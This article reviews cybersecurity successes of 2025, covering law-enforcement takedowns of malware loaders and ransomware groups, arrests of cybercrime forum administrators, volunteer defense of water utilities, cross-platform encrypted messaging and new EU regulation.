Good News in Cybersecurity

Scroll through your newsfeed on any given day, and you’ll likely encounter the usual topics: data breaches, ransomware demands, zero-day exploits, and terrifying headlines about digital doomsday scenarios. Cybersecurity news tends to spotlight what went wrong. But here’s the thing: Not all cybersecurity stories are about chaos. Some are about control.

While 2025 saw its fair share of midnight threat alerts and urgent incident response calls, it also saw something else: progress. Quietly but powerfully, coalitions of governments, law enforcement, tech companies, and even volunteer hacker communities banded together to push back. They dismantled threat actors’ infrastructure, made arrests, and collapsed malware rings. 2025 wasn’t just a year of fighting fires; it was a year of action and achieving outcomes for a safer, more secure world.

Following is a celebration of some of the biggest cybersecurity wins in 2025, including what’s been built, disrupted, and defended – all of which is making a positive difference in cybersecurity.

One of the most celebrated wins of 2025 came through Operation Endgame 2.0, a continuation of a collaborative international law enforcement initiative that tackled some of the most notorious malware loaders in the world.

These malware loaders often function as the first step in delivering larger-scale attacks like ransomware or data exfiltration. The campaign dismantled core infrastructure behind prominent threats such as TrickBot, BumbleBee, IcedID, and SmokeLoader, all names that have appeared in threat reports for years.

The coordinated action spanned multiple countries and involved Europol, the Federal Bureau of Investigation (FBI), the Dutch National Police, and private sector partners. It resulted in arrests, infrastructure seizures, and the neutralization of key command-and-control servers. Moreover, the joint task force created AI-generated episodic updates to advertise their takedowns and discourage budding criminals.

For cybersecurity professionals, Operation Endgame 2.0 was a huge success. It translated into fewer successful phishing campaigns, a notable drop in loader activity, and a safer landscape for organizations managing endpoint security and phishing-resistant access. It also demonstrated that international collaboration is possible – and essential – when dealing with cybercrime at scale.

Ransomware gangs shut down

In 2025, law enforcement activity targeting ransomware groups significantly increased. From affiliate arrests to infrastructure seizures, ransomware operations faced their most difficult year yet.

Key disruptions included:

• Scattered Spider. In July, U.K. authorities made four arrests for data theft and extortion, building on related Scattered Spider arrests made in the U.S. in November 2024.
• BlackSuit. Authorities seized BlackSuit infrastructure and halted their ransomware-as-a-service operations.
• Hunters International. Joint international forces dismantled Hunters International operations and ended their run of high-profile healthcare and education sector attacks.
• Phobos ransomware. The U.S. Department of Justice (DOJ) charged two Russians who used Phobos ransomware to target more than 1,000 public and private entities and demand more than $16.5 million in ransomware payments.
• Qakbot and DanaBot. The DOJ charged several Russian nationals in separate schemes to defraud organizations via spam bomb attacks and Qakbot and DanaBot malware.

While these efforts do not eliminate ransomware overnight, they do disrupt the flow of operations, force groups to rebuild infrastructure, and expose gaps in their affiliate models. Every successful arrest or infrastructure seizure represents a delay in attack planning, a reduction in number of victims, and a hit to the profitability of ransomware as a business.

In an environment where attackers rarely face consequences, the progress made in 2025 marks a meaningful shift in the balance.

Volunteers protecting critical infrastructure

Another encouraging development in 2025 was the growth of volunteer-based cybersecurity defense efforts in the U.S.

This year, hundreds of ethical hackers and cybersecurity professionals stepped forward to defend small and midsized water utilities that had become easy targets for cybercriminals. These volunteer efforts were part of the Cyber Resilience Corps, a nongovernmental initiative that pairs cybersecurity talent with public infrastructure operators in need of support.

From patching outdated supervisory control and data acquisition systems to setting up logging and alerting frameworks, these volunteers provided technical and strategic assistance that many small utilities could not otherwise afford. Several of these volunteers presented their results at the DEF CON 2025 hacktivist convention in Las Vegas to showcase how community-led cybersecurity defense can be scaled and structured.

This shift toward community cyber defense offers a powerful message: Protection doesn't have to come from top-down regulations alone. With the right frameworks and a little coordination, communities can empower themselves to become cyber resilient against nation-state and criminal attacks.

Secure messaging: RCS and E2EE

In a quieter but equally important development, Apple announced in 2025 that it would support rich communication services (RCS) messaging with Android users, finally allowing for end-to-end encryption (E2EE) between iPhone and Android devices using the Global System for Mobile Communications Association standard.

This change bridges a long-standing gap in consumer communications security. For years, iMessage and other proprietary apps had encrypted messaging, but cross-platform communication remained a weak link. With RCS now supporting encryption, consumers across platforms are better protected against message interception and metadata exposure.

While not directly related to corporate security, this progress in consumer privacy and data integrity has long-term implications. More awareness of encryption and secure messaging helps build better habits, especially among employees using bring-your-own-device setups.

Other notable wins worth celebrating

In addition to the headline-making takedowns and policy wins, several other developments deserve recognition for their impact on the cyberthreat landscape in 2025:

• Interpol’s infostealer crackdown. With Operation Secure, one of the most coordinated operations of the year, Interpol successfully dismantled a global web of more than 20,000 malicious IPs and domains tied to infostealer malware. This effort significantly reduced the digital footprint of credential harvesters and disrupted access to sensitive personal and corporate data for thousands of cybercriminals.
• LummaC2 malware disruption. In 2025, CISA and the FBI issued advisory AA25‑141B detailing the operations of LummaC2, a widely distributed information-stealing malware sold on Russian-language forums since 2022. Delivered through phishing emails, fake CAPTCHAs, and trojanized software, LummaC2 exfiltrates sensitive data, including credentials, multifactor authentication tokens, and crypto asset wallets. The advisory revealed that from April to June 2024, more than 21,000 listings of LummaC2-stolen data appeared on cybercrime markets, which represented a 72% increase from 2023. While the advisory does not mention infrastructure seizures, it provides extensive technical guidance to help defenders detect and mitigate ongoing threats posed by LummaC2.
• BreachForums and XSS arrests. Major administrators behind popular cybercrime forums, such as BreachForums and XSS, were arrested, which led to the shutdown of platforms used for selling stolen data, malware kits, and access credentials. These forums had long enabled threat actors to monetize breaches, and their removal has sent shockwaves across the dark web.
• Positive hacktivism: LockBit and Everest disrupted. Unidentified actors managed to breach and deface dark web infrastructure of ransomware groups, including LockBit and Everest. The attackers exposed internal negotiations, victim lists, and operational tactics, which created internal distrust and temporarily paralyzed communication among these criminal networks.
• European Union’s new cyber resilience regulation. The European Union passed the Digital Operational Resilience Act, which requires affected financial services organizations to follow guidelines to protect information and communications technology. The law requires periodic resilience testing, incident reporting, and third-party risk management among other obligations and could set the standard for future legislation in other regions.
• North Korean IT worker fraud crackdown. Law enforcement and private sector coalitions uncovered a widespread scheme where North Korean operatives posed as freelance IT workers to generate income and bypass sanctions. By identifying and removing these fake identities from major gig platforms and raiding local laptop farms, the crackdown weakened a key financial pipeline used to support illicit cyber operations by nation-state actors.

Capitalizing on wins

The cybersecurity landscape is not just defined by attacks, as events in 2025 have shown. It is also shaped by response, resilience, and cooperation. Whether through international law enforcement, government-private partnerships, or grassroots community defense, cybersecurity defenders are becoming more organized, more resourceful, and more visible.

While the threat landscape will continue to evolve and become more complex, the 2025 victories remind us that progress is possible. Cybersecurity is not just about managing risk; it is about actively shaping a safer digital future. Organizations can carry these wins forward and continue building systems that protect, empower, and enable trust, one security control at a time.